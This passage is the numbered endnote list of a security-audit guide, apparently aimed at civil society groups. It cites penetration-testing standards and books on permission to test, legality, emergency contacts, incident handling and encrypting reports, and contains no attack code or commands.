  6. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  7. See the auditor trainee resource list

  8. APPENDIX A - Auditor travel kit checklist

  9. "Traveling teams should maintain a flyaway kit that includes systems, images, additional tools, cables, projectors, and other equipment that a team may need when performing testing at other locations."

  10. Auditor Tool Resource List - Password Dictionary Creation

  11. APPENDIX A - Auditor travel kit checklist

  12. "Traveling teams should maintain a flyaway kit that includes systems, images, additional tools, cables, projectors, and other equipment that a team may need when performing testing at other locations."

  13. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  14. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  15. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  16. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  17. "In addition, some service providers require advance notice and/or separate permission prior to testing their systems. For example, Amazon has an online request form that must be completed, and the request must be approved before scanning any hosts on their cloud. If this is required, it should be part of the document."

  18. Determining Audit Location - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  19. "When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests."

  20. Usually when working with an external funder an engagement report, free of sensitive data about the host organization, will be created for submission the funder. The contents of this report should be clearly outlined and agreed to during the assessment plan stage.

  21. Determining Audit Location - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  22. "Before starting a penetration test, all targets must be identified. "

  23. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  24. "the assessment plan should provide specific guidance on incident handling in the event that assessors cause or uncover an incident during the course of the assessment. This section of the plan should define the term incident and provide guidelines for determining whether or not an incident has occurred. The plan should identify specific primary and alternate points of contact for the assessors... The assessment plan should provide clear-cut instructions on what actions assessors should take in these situations."

  25. "When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests."

  26. "One of the most important documents which need to be obtained for a penetration test is the Permission to Test document."

  27. Dealing with third parties - The Penetration Testing Execution Standard

  28. APPENDIX D - Auditor Consent Template.

  29. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  30. "Obviously, being able to get in touch with the customer or target organization in an emergency is vital."

  31. NIST SP 800-115, Technical Guide to Information Security Testing and Assessment. Section 7.1 Coordination

  32. Emergency Contact and Incidents - The Penetration Testing Execution Standard: Pre-Engagement Guidelines

  33. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  34. "Assessors need to remain abreast of new technology and the latest means by which an adversary may attack that technology. They should periodically refresh their knowledge base, reassess their methodology-updating techniques as appropriate, and update their tool kits."

  35. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  36. "IDEO Human-Centered Design Toolkit"

  37. "IDEO Human-Centered Design Toolkit"

  38. Accumulating information about partners, clients, and competitors - The Penetration Testing Execution Standard

  39. The flow of information through the Recon-ng framework. (See: "Data Flow" section)

  40. Accumulating information about partners, clients, and competitors - The Penetration Testing Execution Standard

  41. Acquiring API Keys

  42. The flow of information through the Recon-ng framework. (See: "Data Flow" section)

  43. "Threat Modeling: Designing for Security" by Adam Shostack

  44. See: Vulnerability Analysis

  45. Identifying Software Versions

  46. Examining Firewalls Across OS

  47. Identifying Odd/One-Off Services

  48. APPENDIX C - Password Survey

  49. Password Security

  50. Privilege Separation Across OS

  51. Anti-Virus Updates

  52. Identifying Software Versions

  53. Device Encryption By OS Type

  54. APPENDIX C - Password Survey

  55. Password Security

  56. Privilege Separation Across OS

  57. Anti-Virus Updates

  58. Identifying Software Versions

  59. Device Encryption By OS Type

  60. Microsoft Security Bulletin

  61. "In-Depth Reading, Vendor Information, & External Advisories"

  62. "Security-Related Vendor Information"

  63. "CERT/CC Advisories"

  64. "Security Tracker"

  65. "Known Vulnerabilities in Mozilla Products"

  66. Microsoft Security Bulletin

  67. "In-Depth Reading, Vendor Information, & External Advisories"

  68. "Security-Related Vendor Information"

  69. "CERT/CC Advisories"

  70. "Security Tracker"

  71. "Known Vulnerabilities in Mozilla Products"

  72. "While vulnerability scanners check only for the possible existence of a vulnerability, the attack phase of a penetration test exploits the vulne rability to confirm its existence."

  73. "Penetration testing also poses a high risk to the organization’s networks and systems because it uses real exploits and attacks against production systems and data. Because of its high cost and potential impact, penetration testing of an organization’s network and systems on an annual basis may be sufficient. Also, penetration testing can be designed to stop when the tester reaches a point when an additional action will cause damage." - NIST SP 800-115, Technical Guide to Information Security Testing and Assessment

  74. Network Access

  75. APPENDIX B - Personal Information to Keep Private

  76. APPENDIX B - Personal Information to Keep Private

  77. "CSOs should gradually build a culture in which all staff, regardless of technical background, feel some responsibility for their own digital hygiene. While staff need not become technical experts, CSOs should attempt to raise the awareness of every staff member, from executive directors to interns - groups are only as strong as their weakest link—so that they can spot issues, reduce vulnerabilities, know where to go for further help, and educate others."

  78. "Pre-Mortum Strategy" - Sources of Power: How People Make Decisions - p.71

  79. "Pre-Mortum Strategy" - Sources of Power: How People Make Decisions - p.71

  80. "Pre-Mortum Strategy" - Sources of Power: How People Make Decisions - p.71

  81. Corruption Perception Index

  82. The ISC Project completes evaluations of information security threats in a broad range of countries. The resulting comprehensive written assessments describe each country’s digital security situation through consideration of four main categories: online surveillance, online attacks, online censorship, and user profile/access.

  83. EISF distributes frequent analysis and summaries of issues relevant to humanitarian security risk management.

  84. The top 500 sites in each country or territory.

  85. Who publishes Transparency Reports?

  86. "Impacts: Chapter 2.7 p. 46 - Operational Security Management in Violent Environments"

  87. "Likelihood: Chapter 2.7 p. 47 - Operational Security Management in Violent Environments"

  88. " Some activities common in penetration tests may violate local laws. For this reason, it is advised to check the legality of common pentest tasks in the location where the work is to be performed."

  89. "Threat Modeling: Designing for Security" by Adam Shostack

  90. See: "Threat Modeling: Designing for Security" by Adam Shostack, p. 125.

  91. "Threat Modeling: Designing for Security" by Adam Shostack

  92. See: "Threat Modeling: Designing for Security" by Adam Shostack, p. 401.

  93. "When a pilot lands an airliner, their job isn’t over. They still have to navigate the myriad of taxiways and park at the gate safely. The same is true of you and your pen test reports, just because its finished doesn't mean you can switch off entirely. You still have to get the report out to the client, and you have to do so securely. Electronic distribution using public key cryptography is probably the best option, but not always possible. If symmetric encryption is to be used, a strong key should be used and must be transmitted out of band. Under no circumstances should a report be transmitted unencrypted. It all sounds like common sense, but all too often people fall down at the final hurdle." - The Art of Writing Penetration Test Reports